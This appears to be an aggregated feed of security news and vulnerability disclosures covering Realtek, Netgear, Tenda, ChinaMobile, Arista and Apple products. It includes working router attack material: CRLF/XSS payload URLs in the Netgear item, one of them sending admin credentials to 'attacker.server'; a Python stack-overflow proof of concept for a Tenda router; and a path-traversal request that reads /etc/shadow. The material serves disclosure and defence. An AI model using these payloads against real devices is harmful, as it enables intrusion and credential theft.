By Deeba Ahmed
This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.
This is a post from HackRead.com Read the original post: Critical Realtek Vulnerability Impacting IoT Devices Worldwide

As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.

According to a new report from Palo Alto Networks’ Unit 42 researchers, between August and October 2022, cybercriminals increased their efforts to exploit a Realtek Jungle SDK vulnerability.

Usually, researchers record 10% of all attacks targeting a single vulnerability. But in this case, over 40% of all attacks involved exploitation of the Realtek remote code execution **(RCE)** vulnerability.

**Vulnerability Analysis**

The Realtek Jungle SDK RCE is tracked as **CVE-2021-35394**, rated 9.8. As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.

This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.

Hackers find it useful because it can create **supply-chain issues** that make it difficult for users to identify the products that attackers are exploiting. It’s an arbitrary command injection and buffer overflow bug that could be leveraged to execute arbitrary code and gain the highest level of privileges, eventually hijacking the infected device appliance.

**Attack Details**

According to Unit 42’s **blog post**, most of the attacks observed were attempts to deliver malware and compromise **vulnerable IoT devices**, indicating that threat actors aim to launch large-scale attacks against internet-connected devices worldwide.

Around 50% of the attacks (48.3% to be precise) were launched from the USA, followed by Vietnam (17.8%) and Russia (14.6%). Other prominent regions include the Netherlands (7.4%), Germany (2.3%), France (6.4%), and Luxembourg (1.6%).

Moreover, 95% of the attacks targeting the vulnerability and originating from Russia were launched against Australian organizations.

**Potential Dangers**

Unit 42 identified three kinds of payloads that were distributed through in-the-wild exploitation of this bug. The first payload was a script that executed a shell command on the targeted server and downloaded another malware.

The second payload is an injected command that writes a binary payload to a file and executes that file. The third is an injected command that directly reboots the targeted server to launch DoS (denial of service) attacks.

Additionally, attackers can exploit this bug to deliver known botnets such as **Mozi**, **Mirai**, **Gafgyt**, and the new Golang-based DDoS botnet called RedGoBot.

Vulnerable IoT devices include IP cameras, routers, residential gateways, and Wi-Fi repeaters from at least 66 vendors, including Belkin, D-Link, ASUS, Huawei, LG, ZTE, Logitech, Zyxel, and **NETGEAR**.

**_More IoT Security News_**

1.  BotenaGo botnet malware targeting millions of IoT devices
2.  IoT Devices Hacked to Install Ransomware on OT Networks
3.  ThroughTek Flaw Exposed Millions of IoT Cameras to Spying
4.  Millions of IoT devices, baby monitors open to video snooping
5.  Access:7 Supply Chain Flaws Impact ATMs, Medical, IoT devices

Critical Realtek Vulnerability Impacting IoT Devices Worldwide

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection. A malicious unauthenticated attacker can exploit this vulnerability using a specially crafted URL. This affects firmware versions: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1.

**Response Splitting via CRLF****Description**

CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html

Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP headers parse certain characters such as \\rand \\n. Appending these characters to HTTP headers can allow the insertion of payloads into a header which can result in the manipulation of cookies, server information, and status codes.

Type: Unauthenticated Remote attack

Tested on firmware version: V1.1.0.112\_1.0.1, V1.1.0.114\_1.0.1

**Details**

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.

This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user's browser.

**Impact**

A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:

1.  Perform actions on the administrative portion of the web application Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
    
2.  Obtain the administrator's credentials through phishing Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>
    

Note that if another vulnerability is presented in the administrative portal such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL and chain the two vulnerabilities to create a one-click exploit.

**Evidence**

The request consists of a resource that does not exist ("xsstesty") followed by Line-Feed characters (%0A%0A) and the JavaScript payload.

Request

    GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E 
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: sessionid=sid17289xxx158005xxx1087458037
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    

Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim's browser.

Response Body

    <script>alert('xss');</script> HTTP/1.1 404 Not Found
    Server: 
    Date: Fri, 02 Jan 1970 02:44:27 GMT
    Content-Type: text/html
    P3P: 443
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1;mode=block
    X-Content-Type-Options: nosniff
    Connection: close
    
            <HTML>
            <HEAD><TITLE>404 Not Found</TITLE></HEAD>
            <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
            <H4>404 Not Found</H4>
    File not found.
    </BODY>
    </HTML>
    

**Remediation**

Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

CVE-2022-47052: NETGEAR/CVE-2022-47052 at main · dest-3/NETGEAR

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.

****CVE-2023-24166****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

import requests
from pwn import \*

url \= 'http://x.x.x.x/goform/WifiBasicSet'
pl \= 'a'\*564+p32(0xdeadbeef)
data \= {'security\_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid\_5g':'1', 'ssid\_5g':'1', 'wrlPwd\_5g': '1'}

requests.post(url, data\=data)

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24166: Tenda/2.md at main · DrizzlingSun/Tenda

An issue was discovered in the default configuration of ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C_WIFI-V0.05), allows attackers to gain access to the configuration interface.

**Blank passwords and default factory settings**

ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C\_WIFI-V0.05) is shipped and deployed without an administrative password on port **8080** and the web configuration interface is accessible using the following syntax: **http://<target ip>:8080.** From the configuration page an attacker can change the router configuration or he can try to obtain access to the internal network.

**Directory traversal vulnerability**

A different directory traversal vulnerability than the one identified by Rahul Raz (https://www.exploit-db.com/exploits/40304) was identified by using:

**_GET /cgi-bin/webproc?getpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&errorpage=html/main.html&var:language=zh\_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage=-_**

to retrieve the **_etc/shadow_** file where two user accounts were identified with the corresponding hashed passwords:

**root:<hash\_deleted>:13796:0:99999:7:::**

**#tw:<hash\_deleted>:13796:0:99999:7:::**

**Attack surface**

Over 4,320 vulnerable PLC Wireless routers were identified using Shodan. Most of the devices are located in South America (Argentina, Brazil, Honduras, Colombia) followed by Asia (Indonesia, India, Thailand).

**Remediation**

Adding a password to the admin user accounts should reduce the risk of being exploited. The risk of a successful directory traversal still exist and given the fact that the user can’t change the **tw** account password other risk mitigation strategies should be employed.

CVE-2020-18330: Insecure permissions and multiple vulnerabilities in ChinaMobile PLC wireless routers leaves more than 4,300 devices vulnerable to remote attacks

Directory traversal vulnerability in ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C_WIFI-V0.05), via the getpage parameter to /cgi-bin/webproc.

**Insecure permissions and multiple vulnerabilities in ChinaMobile PLC wireless routers leaves more than 4,300 devices vulnerable to remote attacks Blank passwords and default factory settings**

ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C\_WIFI-V0.05) is shipped and deployed without an administrative password on port 8080 and the web configuration interface is accessible using the following syntax: http://:8080. From the configuration page an attacker can change the router configuration or he can try to obtain access to the internal network.

**Directory traversal vulnerability**A different directory traversal vulnerability than the one identified by Rahul Raz (https://www.exploit-db.com/exploits/40304) was identified by using:

GET /cgi-bin/webproc?getpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage=- to retrieve the etc/shadow file where two user accounts were identified with the corresponding hashed passwords:

root:<hash_deleted>:13796:0:99999:7::: #tw:<hash_deleted>:13796:0:99999:7:::

**Attack surface**Over 4,320 vulnerable PLC Wireless routers were identified using Shodan. Most of the devices are located in South America (Argentina, Brazil, Honduras, Colombia) followed by Asia (Indonesia, India, Thailand).**Remediation**Adding a password to the admin user accounts should reduce the risk of exploitation. The risk of a successful directory traversal still exist and given the fact that the user can’t change the tw account password other risk mitigation strategies should be employed.**Author**Sergiu Sechel (https://sergiusechel.medium.com/insecure-permissions-and-multiple-vulnerabilities-in-chinamobile-plc-wireless-routers-leaves-more-d3eb9ff70d24)

CVE-2020-18331: CVEs/CVE_2020_18331.md at main · cybertoxin/CVEs

For certain systems running EOS, a Precision Time Protocol (PTP) packet of a management/signaling message with an invalid Type-Length-Value (TLV) causes the PTP agent to restart. Repeated restarts of the service will make the service unavailable.

April 26th, 2022

**Revision**

**Date**

**Changes**

1.0

April 26th, 2022

Initial release

1.1

May 16th, 2022

Updated hotfix information

The CVE-ID tracking this issue: CVE-2021-28510  
CVSSv3.1 Base Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)  
Common Weakness Enumeration: CWE-400 (Uncontrolled Resource Consumption)  
This vulnerability is being tracked by BUG638107

****Description****

For certain systems running EOS, a Precision Time Protocol (PTP) packet of a management/signaling message with an invalid Type-Length-Value (TLV) causes the PTP agent to restart. Repeated restarts of the service will make the service unavailable.

The impact of this issue is that a remote attacker can make the PTP service unavailable. If this happens, the switch will fail to provide PTP time synchronization services to the devices downstream, leading to the degrading of the time maintained by the downstream devices.

This issue was discovered by a customer and Arista is not aware of any malicious uses of this issue in customer networks.

**Vulnerability Assessment****Affected Software**

EOS Versions

*   4.27.1 and below releases in the 4.27.x train
*   4.26.4 and below releases in the 4.26.x train
*   4.25.6 and below releases in the 4.25.x train
*   4.24.8 and below releases in the 4.24.x train
*   4.23.10 and below releases in the 4.23.x train
*   4.22.x train

**Affected Platforms**

The following products are affected by this vulnerability:

Any platform supporting PTP.

Arista EOS-based products:

*   7020R Series
*   7050X/X2/X3 series
*   7060X/X2/X4 series
*   7150 series
*   7170 series 
*   720XP series
*   7250X series
*   7260X/X3 series
*   7280E/R/R2 series
*   7300X/X3 series
*   7320X series
*   7368 / X4 series
*   7500E/R/R2 series
*   7500R3 Series
*   7800R3 Series
*   7280R3 Series

The following product versions and platforms are not affected by this vulnerability:

*   Arista EOS-based products:
    *   7010 series
    *   7160 series
    *   750X series
*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   CloudVision Portal, virtual appliance or physical appliance
*   CloudVision as-a-Service
*   Arista 7130 Systems running MOS
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Awake Security Platform

**Required Configuration for Exploitation**

In order to be vulnerable to CVE-2021-28510 the following conditions must be be met:

PTP should be enabled on the switch. To determine if PTP is enabled on the switch,

switch# show ptp
PTP Mode: Boundary Clock
PTP Profile: Default ( IEEE1588 )
Clock Identity: 0x74:83:ef:ff:ff:00:23:b1
Grandmaster Clock Identity: 0x00:00:00:00:00:00:00:00
Number of slave ports: 1
Number of master ports: 4
Offset From Master (nanoseconds): 0
Mean Path Delay (nanoseconds): 0
Steps Removed: 0
Skew (estimated local-to-master clock frequency ratio): 1.0

**Indicators of Compromise**

This issue causes the PTP agent to crash. If you are seeing a high number of syslog messages stating that the PTP agent is being restarted, this issue is potentially being exploited.

Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-6-PROCESS\_TERMINATED: 'Ptp' (PID=17476, status=15) has terminated.
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-6-PROCESS\_RESTART: Restarting 'Ptp' immediately (it had PID=17476)
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-7-PREDECESSOR\_WAITING: New instance of Ptp (PID=17833): waiting for reaping of predecessor (PID=17476)
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-7-PREDECESSOR\_GONE: New instance of Ptp (PID=17833): predecessor (PID=17476) has been reaped.
Apr 12 02:32:08 ok312 ProcMgr-worker: %PROCMGR-6-PROCESS\_STARTED: 'Ptp' starting with PID=17833 (PPID=3067) -- execing '/usr/bin/Ptp'
Apr 12 02:32:08 ok312 Ptp: %AGENT-6-INITIALIZED: Agent 'Ptp' initialized; pid=17833

**Mitigation**

Install ACL rules to drop PTP packets from untrusted sources. Best practice is to block access to untrusted (non-management) networks.

ptp ip access-group ptpAcl in
<-------OUTPUT OMITTED FROM EXAMPLE-------->
!
ip access-list ptpAcl
   10 deny ip host 10.10.10.1 any

**Resolution**

The recommended resolution is to upgrade to a remediated software version at your earliest convenience. Arista recommends customers move to the latest version of each release that contains all the fixes listed below.

CVE-2021-28510 has been fixed in the following releases:

*   4.27.2 and later releases in the 4.27.x train
*   4.26.5 and later releases in the 4.26.x train
*   4.25.7 and later releases in the 4.25.x train
*   4.24.9 and later releases in the 4.24.x train
*   4.23.11 and later releases in the 4.23.x train

For immediate remediation until EOS can be upgraded, the following hotfix is available.

**Hotfix**

The following hotfix can be applied to remediate CVE-2021-28510. The hotfix applies only to 4.23.10 and no other releases. All other versions require upgrading to a release containing the fix (as listed above).

Note: Installing/uninstalling the SWIX will cause the PTP agent to restart.

**Version:** 1.0

**URL:****SecurityAdvisory76\_CVE-2021-28510\_Hotfix.swix**

**SWIX hash:**

(SHA-512)2b78b8274b7c73083775b0327e13819c655db07e22b80038bb3843002c679a798b53a4638c549a86183e01a835377bf262d27e60020a39516a5d215e2fadb437

For instructions on installation and verification of the hotfix patch, refer to the “managing eos extensions” section in the EOS User Manual. Ensure that the patch is made persistent across reboots by running the command ‘_copy installed-extensions boot-extensions_’.

**For More Information**

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

**Open a Service Request**

Contact information needed to open a new service request may be found at: https://www.arista.com/en/support/customer-support

CVE-2021-28510: Security Advisory 0076 - Arista

Your smartphone or wearable could help you out in a truly dangerous situation. Here are some options to consider.

The Best Personal Safety Devices, Apps, and Alarms (2023)

Apple Security Advisory 2023-01-23-4 - macOS Ventura 13.2 addresses buffer overflow, bypass, code execution, information leakage, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-4 macOS Ventura 13.2

macOS Ventura 13.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213605.

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog)

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl  
version 7.86.0.  
CVE-2022-42915  
CVE-2022-42916  
CVE-2022-32221  
CVE-2022-35260

dcerpc  
Available for: macOS Ventura  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco  
Talos

DiskArbitration  
Available for: macOS Ventura  
Impact: An encrypted volume may be unmounted and remounted by a  
different user without prompting for the password  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may lead to a denial-of-service  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-23507: an anonymous researcher

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Mail Drafts  
Available for: macOS Ventura  
Impact: The quoted original message may be selected from the wrong  
email when forwarding an email from an Exchange account  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23498: an anonymous researcher

Maps  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23503: an anonymous researcher

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23497: Mickey Jin (@patch1t)

Safari  
Available for: macOS Ventura  
Impact: An app may be able to access a user’s Safari history  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Safari  
Available for: macOS Ventura  
Impact: Visiting a website may lead to an app denial-of-service  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2023-23512: Adriatik Raci

Screen Time  
Available for: macOS Ventura  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

Vim  
Available for: macOS Ventura  
Impact: Multiple issues in Vim  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-3705

Weather  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming  
Wang, JiKai Ren and Hang Shu of Institute of Computing Technology,  
Chinese Academy of Sciences

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Wi-Fi  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Windows Installer  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23508: Mickey Jin (@patch1t)

Additional recognition

Bluetooth  
We would like to acknowledge an anonymous researcher for their  
assistance.

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

Shortcuts  
We would like to acknowledge Baibhav Anand Jha from ReconWithMe and  
Cristian Dinca of Tudor Vianu National High School of Computer  
Science, Romania for their assistance.

WebKit  
We would like to acknowledge Eliya Stein of Confiant for their  
assistance.

macOS Ventura 13.2 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke  
Nxnt7RAA2a0c/Ij93MfR8eiNMkIHVnr+wL+4rckVmHvs85dSHNBqQ8+kYpAs2tEk  
7CVZoxAGg8LqVa6ZmBbAp5ZJGi2nV8LjOYzaWw/66d648QC2upTWJ93sWmZ7LlLb  
m9pcLfBsdAFPmVa8VJO0fxJGkxsCP0cQiBl+f9R4ObZBBiScbHUckSmHa6Qn/Q2U  
VsnHnJznAlDHMXiaV3O1zKBeahkqSx/IfO04qmk8oMWh89hI53S551Z3NEx63zgd  
Cx8JENj2NpFlgmZ0w0Tz5ZZ3LT4Ok28ns8N762JLE2nbTfEl7rM+bjUfWg4yJ1Rp  
TCEelbLKfUjlrh2N1fe0XWBs9br/069QlhTBBVd/qAbUBxkS/UOlWk3Vp+TI0bkK  
rrXouRijzRmBBK93jfWxhyd27avqQHmc04ofjY/lNYOCcGMrr813cGKNs90aRfcg  
joKeC51mYJnlTyMB0nDcJx3b5+MN+Ij7Sa04B9dbH162YFxp4LsaavmR0MooN1T9  
3XrXEQ71a3pvdoF1ffW9Mz7vaqhBkffnzQwWU5zY2RwDTjFyHdNyI/1JkVzYmAxq  
QR4uA5gCDYYk/3rzlrVot+ezHX525clTHsvEYhIfu+i1HCxqdpvfaHbn2m+i1QtU  
/Lzz2mySt3y0akZ2rHwPfBZ8UFfvaauyhZ3EhSP3ikGs9DOsv1w=  
=pcJ4  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-4

By Deeba Ahmed
Roaming Mantis malware was last seen in April 2018 targeting iOS and Android devices with cryptocurrency mining malware but this time, it has new DNS changer capabilities.
This is a post from HackRead.com Read the original post: Roaming Mantis Malware Returns with DNS Changer Capability

Currently, the primary target of the new Roaming Mantis malware is users in South Korea, but Kaspersky cybersecurity researchers suspect its scope will be expanded soon.

According to a report from Kaspersky Labs, the infamous Roaming Mantis attack campaign, aka Shaoye has resurfaced with a brand-new scheme. As **previously reported by Hackread.com**, Roaming Mantis operators use DNS changer functionality to abuse compromised public WiFi routers.

The objective is to infect a large number of Android smartphones with Wroba.o mobile malware (also called Agent.eq, Moqhao, XLoader). The prominent target of this campaign is users in South Korea. However, Kaspersky cybersecurity researchers suspect its scope to be expanded soon.

**Threat Analysis**

Researchers explained that the Roaming Mantis attackers are delivering a revamped version of their patent mobile malware Wroba for **infiltrating WiFi routers** and hijacking Domain Name System/DNS.

This malicious new attack is designed to specifically target South Korean WiFi routers manufactured by one of the leading network equipment vendors in South Korea.

The campaign recently introduced a DNS changer functionality in its mobile malware. DNS changer is a malicious attack technique that forces a device connected to an infected WiFi router to be directed to an attacker-controlled server instead of a genuine DNS server.

The victim is asked to download malware that **steals credentials or hijacks the device** on this malicious landing page. Around 508 malicious APK downloads were observed by Kaspersky in December 2022.

**How does the Attack Works?**

The new DNS changer functionality first detects the router’s IP address to check its model and compromises the targeted devices by overwriting the DNS settings. Some compromised devices leverage WiFi routers to take users to a fake landing page through DNS hijacking to redirect targets to bogus sites.

Regardless of which method is used, the invasion allows the attackers to deploy mobile malware that carries out a range of malicious activities. Kaspersky researcher Suguru Ishimaru **stated** that this new functionality could manage all device communications via the infected router, like redirecting to malicious hosts and disabling security product updates.

Infection flow of the Roaming Mantis malware with DNS hijacking (Credit: Kaspersky)

**About Roaming Mantis**

For your information, Roaming Mantis is a financially motivated, long-running cybercrime campaign in which attackers target Android smartphones and infect them with malware to steal banking credentials and sensitive data. The campaign was first observed in **April 2018** by Kaspersky when it used DNS hijacking to infect Android smartphones and hijack data.

It used malicious APK (Android package) files to gain control of infected Android devices and steal data. However, a phishing option is available for **iOS devices and PCs equipped with cryptocurrency mining features**. From Asian targets, the cyber crooks running this campaign expanded their range to France and Germany in 2022.

**How to stay Protected?**

You can protect your internet connection from the infection by referring to your router’s user manual to verify whether your DNS settings have been tampered with or contact your ISP. Update your default login/password for the router’s admin web interface and regularly update its firmware from the official source. Check browser and web addresses before visiting to make sure they are legitimate, and before entering data, check the address.

1.  Facebook removes accounts for iOS, Android malware
2.  Shazam Flaw exposed Android and iOS users’ location
3.  Android sends more data to Google than iOS to Apple
4.  Spyware Vendor Offer Android and iOS Device Exploits
5.  How to identify malware on your phone with these signs

Roaming Mantis Malware Returns with DNS Changer Capability

Whitepaper called DensePose From WiFi. It discusses how scientists from Carnegie Mellon University have figured out how to map a human's 3D form by using two wifi routers.

Tag

#wifi